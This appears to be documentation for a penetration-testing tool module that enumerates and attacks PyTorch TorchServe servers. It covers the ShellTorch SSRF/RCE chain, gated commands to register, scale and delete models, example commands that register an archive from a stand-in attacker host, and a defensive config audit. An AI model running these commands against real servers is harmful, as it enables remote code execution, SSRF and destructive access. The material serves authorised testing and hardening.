
TorchServe

Enumerate and exploit PyTorch TorchServe model serving instances.

Overview

The torchserve module targets TorchServe's three separate APIs: management, inference, and metrics. The management API (default port 8081) is the primary attack surface because it exposes model registration, scaling, and deletion, and older releases put no authentication in front of it at all; TorchServe's default config binds it to 127.0.0.1, so a management API reachable over the network is already a misconfiguration worth reporting. The --target flag points to the management API; use --inference-url and --metrics-url to override the inference (8080) and metrics (8082) ports. Recent releases enable token authorization by default, so if read-only calls come back 401/403, supply the token with --header.

The register subcommand exercises the ShellTorch chain (CVE-2023-43654, CVE-2024-35195): the management API fetches a model archive from an attacker-supplied URL (SSRF) and then loads it, and because a .mar's handler is Python executed by the worker, a successful registration of an attacker-controlled archive is code execution. Loading a handler is by-design behaviour, so a patched server whose allowed_urls still permits arbitrary http(s) sources remains exploitable through this subcommand.

Subcommands

Read-Only (no --force-exploit required)

Subcommand   Description
enum         List models from the management API and check inference health
models       Detailed model info (handler, runtime, workers, batch size)
metrics      Prometheus metrics from the metrics API

Gated (requires --force-exploit)

Subcommand   Description
predict      Send a prediction via the inference API
register     Register a model from a URL (ShellTorch SSRF/RCE vector)
scale        Scale model workers (proves management write access)
unregister   Delete a model (proves destructive access)

Flags

Flag             Required                              Description
--target         Yes                                   Management API URL (default port 8081)
--header         No                                    Custom HTTP header. Repeatable.
--inference-url  No                                    Override inference API URL (default: derived from --target with port 8080)
--metrics-url    No                                    Override metrics API URL (default: derived from --target with port 8082)
--model          For models, predict, scale, unregister Model name
--payload        For predict                           JSON prediction payload
--model-url      For register                          URL of the model archive (.mar) to register
--min-workers    For scale                             Minimum worker count (default: 1)

Key Endpoints

Management API (port 8081)

Endpoint                       Method  Purpose
/models                        GET     List all registered models
/models/<name>                 GET     Detailed model info
/models?url=<url>              POST    Register a model from a URL (SSRF vector; <url> must be percent-encoded)
/models/<name>?min_worker=<n>  PUT     Scale workers
/models/<name>                 DELETE  Unregister a model

Inference API (port 8080)

Endpoint               Method  Purpose
/ping                  GET     Health check
/predictions/<model>   POST    Inference request (the model name follows /predictions/, not the other way round)

Metrics API (port 8082)

Endpoint   Method  Purpose
/metrics   GET     Prometheus metrics
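The following is an added example, not aipostex or TorchServe code. It mirrors the API layout in the flag and endpoint tables above as offline helpers: derive_api_urls() reproduces the documented defaulting of --inference-url and --metrics-url from --target (same scheme and host, ports 8080 and 8082, which is an assumption taken from the flag table), endpoints() builds every request in the tables with the query values percent-encoded, and the two parsers digest the responses. The sample JSON and metrics text are constructed here in the shape TorchServe's management and metrics APIs return; hosts, model names and numbers are made up.

```python
"""Offline helpers mirroring the TorchServe API layout on this page (added
example, not aipostex code). Port defaulting and response shapes are
assumptions noted inline; sample data is constructed."""
import re
from urllib.parse import urlencode, urlsplit, urlunsplit

INFERENCE_PORT, MANAGEMENT_PORT, METRICS_PORT = 8080, 8081, 8082


def _base(url, port):
    """Scheme and host of url with the given port; path and query dropped."""
    p = urlsplit(url)
    host = p.hostname or "127.0.0.1"
    if ":" in host:  # an IPv6 literal must be re-bracketed
        host = "[%s]" % host
    return urlunsplit((p.scheme or "http", "%s:%d" % (host, port), "", "", ""))


def derive_api_urls(target):
    """--target (management API) -> base URLs of all three APIs (assumed rule)."""
    return {"management": _base(target, urlsplit(target).port or MANAGEMENT_PORT),
            "inference": _base(target, INFERENCE_PORT),
            "metrics": _base(target, METRICS_PORT)}


def endpoints(target, model=None, model_url=None, min_worker=1):
    """(method, url) for the endpoints tabled above. urlencode percent-encodes
    the values, so a model_url containing '&' or '#' cannot add parameters."""
    api = derive_api_urls(target)
    m, i, x = api["management"], api["inference"], api["metrics"]
    out = {"list": ("GET", m + "/models"), "ping": ("GET", i + "/ping"),
           "metrics": ("GET", x + "/metrics")}
    if model_url is not None:
        out["register"] = ("POST", m + "/models?" + urlencode({"url": model_url}))
    if model is not None:
        out["detail"] = ("GET", m + "/models/" + model)
        out["scale"] = ("PUT", m + "/models/%s?%s" % (model, urlencode({"min_worker": min_worker})))
        out["unregister"] = ("DELETE", m + "/models/" + model)
        out["predict"] = ("POST", i + "/predictions/" + model)
    return out


def summarize_model(detail):
    """Flatten GET /models/<name> (a list, one entry per version). A modelUrl
    of http(s)://... shows the model was pulled from a remote URL, i.e. the
    instance's allowed_urls already permitted remote registration."""
    rows = []
    for v in detail:
        workers = v.get("workers", [])
        rows.append({
            "name": v["modelName"], "version": v.get("modelVersion"),
            "runtime": v.get("runtime"), "batch_size": v.get("batchSize"),
            "model_url": v.get("modelUrl"),
            "remote_origin": str(v.get("modelUrl", "")).lower().startswith(("http://", "https://")),
            "workers_ready": sum(1 for w in workers if w.get("status") == "READY"),
            "workers_total": len(workers)})
    return rows


_SAMPLE = re.compile(r"^([A-Za-z_:][A-Za-z0-9_:]*)(?:\{([^}]*)\})?\s+(\S+)")
_LABEL = re.compile(r'(\w+)="([^"]*)"')


def parse_metrics(text):
    """Prometheus exposition text -> list of (name, labels, value)."""
    out = []
    for line in text.splitlines():
        m = _SAMPLE.match(line.strip())
        if line.lstrip().startswith("#") or not m:
            continue
        out.append((m.group(1), dict(_LABEL.findall(m.group(2) or "")), float(m.group(3))))
    return out


def inference_counts(text):
    """model_name -> ts_inference_requests_total: which models are actually in
    use, worth knowing before predict/scale/unregister touches them."""
    counts = {}
    for name, labels, value in parse_metrics(text):
        if name == "ts_inference_requests_total":
            key = labels.get("model_name", "?")
            counts[key] = counts.get(key, 0.0) + value
    return counts


# Constructed samples in the documented response shapes (made-up values).
SAMPLE_DETAIL = [{"modelName": "resnet", "modelVersion": "1.0", "runtime": "python",
                  "modelUrl": "http://10.0.0.9/resnet.mar", "minWorkers": 1,
                  "maxWorkers": 1, "batchSize": 1, "maxBatchDelay": 100,
                  "workers": [{"id": "9000", "status": "READY", "gpu": False}]}]
SAMPLE_METRICS = """\
# TYPE ts_inference_requests_total counter
ts_inference_requests_total{model_name="resnet",model_version="default",hostname="ts-0",} 37.0
ts_inference_requests_total{model_name="bert",model_version="default",hostname="ts-0",} 0.0
ts_queue_latency_microseconds{model_name="resnet",model_version="default",hostname="ts-0",} 142.5
"""

if __name__ == "__main__":
    for k, v in endpoints("http://10.0.0.5:8081", "resnet", "http://attacker.example/test.mar").items():
        print("%-10s %-6s %s" % (k, *v))
    print(summarize_model(SAMPLE_DETAIL))
    print(inference_counts(SAMPLE_METRICS))
```

The remote_origin flag is the useful bit during enumeration: a model whose modelUrl is an http(s) address proves the instance has already accepted a remote registration, which is a stronger indicator than a registration probe and costs nothing.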

ShellTorch Vulnerability

The register subcommand tests the ShellTorch attack chain:

  • CVE-2023-43654 -- SSRF via the model registration URL: the server fetches whatever URL it is given, so the request can be pointed at internal services and cloud metadata endpoints
  • CVE-2024-35195 -- arbitrary code execution through malicious model archive files

Two things have to hold for the chain to work: the management API must be reachable without credentials, and the instance's allowed_urls must accept the source you supply (the shipped default accepts any file:// or http(s):// URL). A registration request that is accepted rather than rejected for violating allowed_urls shows the server will fetch attacker-chosen URLs; confirm it by watching for the fetch on the host behind --model-url. Be deliberate about what that host serves: if a real .mar is there, TorchServe loads it and runs its handler, which is the RCE half of the chain and should only happen when code execution is in scope.
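The two preconditions above can be checked from the server side as well. The following is an added example, not part of this page or of TorchServe: an offline audit of the config.properties settings behind ShellTorch-style exposure, with a weak configuration beside a hardened one. The keys (inference_address, management_address, metrics_address, allowed_urls, model_store) are TorchServe's own; the two configs are constructed here, the internal hostname is made up, and the matching rule (each comma-separated allowed_urls entry is a regex that must match the whole URL) is an assumption about TorchServe.

```python
"""Audit of the config.properties settings behind ShellTorch exposure (added
example, not TorchServe code). Configs are constructed; see lead-in for the
assumptions about allowed_urls matching."""
import re
from urllib.parse import urlsplit

# TorchServe's documented default when allowed_urls is not set: any file or http(s) URL.
DEFAULT_ALLOWED_URLS = "file://.*|http(s)?://.*"
LOOPBACK = {"127.0.0.1", "localhost", "::1"}

WEAK_CONFIG = """\
# management and metrics on every interface, allowed_urls left at the default
inference_address=http://0.0.0.0:8080
management_address=http://0.0.0.0:8081
metrics_address=http://0.0.0.0:8082
model_store=/home/model-server/model-store
"""

# Hardened: management and metrics on loopback only, archives only from the
# local store or an internal registry (hostname is made up).
HARDENED_CONFIG = """\
inference_address=http://0.0.0.0:8080
management_address=http://127.0.0.1:8081
metrics_address=http://127.0.0.1:8082
model_store=/home/model-server/model-store
allowed_urls=file:///home/model-server/model-store/.*,https://models\\.internal\\.example/.*
"""


def parse_properties(text):
    """Minimal key=value parser for config.properties; comments and blanks skipped."""
    props = {}
    for line in text.splitlines():
        line = line.strip()
        if line and not line.startswith(("#", "!")) and "=" in line:
            k, _, v = line.partition("=")
            props[k.strip()] = v.strip()
    return props


def url_allowed(allowed_urls, url):
    """Would this model URL pass allowed_urls? (assumed: full-match per entry)"""
    return any(re.fullmatch(p.strip(), url) for p in allowed_urls.split(",") if p.strip())


def audit_config(text, probe_url="http://attacker.example/test.mar"):
    """Findings that, taken together, make the register vector exploitable."""
    props = parse_properties(text)
    findings = []
    for key in ("management_address", "metrics_address"):
        host = urlsplit(props.get(key, "http://127.0.0.1")).hostname
        if host not in LOOPBACK:
            findings.append("%s bound to %s: reachable from the network" % (key, host))
    allowed = props.get("allowed_urls", DEFAULT_ALLOWED_URLS)
    if url_allowed(allowed, probe_url):
        findings.append("allowed_urls=%s permits registration from %s" % (allowed, probe_url))
    return findings


if __name__ == "__main__":
    for label, cfg in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(label, audit_config(cfg) or ["no findings"])
```

The inference API staying on 0.0.0.0 in the hardened config is intentional: that is the one API clients need, and it cannot register models. Note that allowed_urls only restricts where archives come from; it does nothing about what an archive that passes the filter executes, so the registry behind the allowlist has to be trusted as much as the server itself.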

Examples

# Enumerate models and health
./aipostex torchserve --target http://127.0.0.1:8081 enum

# Detailed model info
./aipostex torchserve --target http://127.0.0.1:8081 models --model resnet

# Extract metrics
./aipostex torchserve --target http://127.0.0.1:8081 metrics

# Test prediction (gated)
./aipostex torchserve --target http://127.0.0.1:8081 predict \
  --model resnet --payload '{"data": "test"}' --force-exploit

# ShellTorch SSRF test (gated); point --model-url at a host you control and watch for the fetch
./aipostex torchserve --target http://127.0.0.1:8081 register \
  --model-url http://attacker.com/test.mar --force-exploit

# Scale workers (gated)
./aipostex torchserve --target http://127.0.0.1:8081 scale \
  --model resnet --min-workers 2 --force-exploit

# Unregister model (gated)
./aipostex torchserve --target http://127.0.0.1:8081 unregister \
  --model resnet --force-exploit

Workflow Progression

discover network (discovers TorchServe on :8080/:8081)
  -> torchserve enum (model listing, health)
    -> torchserve models --model <name> (handler, workers)
    -> torchserve metrics (operational data)
    -> torchserve predict --model <name> (inference test, gated)
    -> torchserve register --model-url <url> (ShellTorch SSRF, gated)
    -> torchserve scale / unregister --model <name> (write and destructive proof, gated)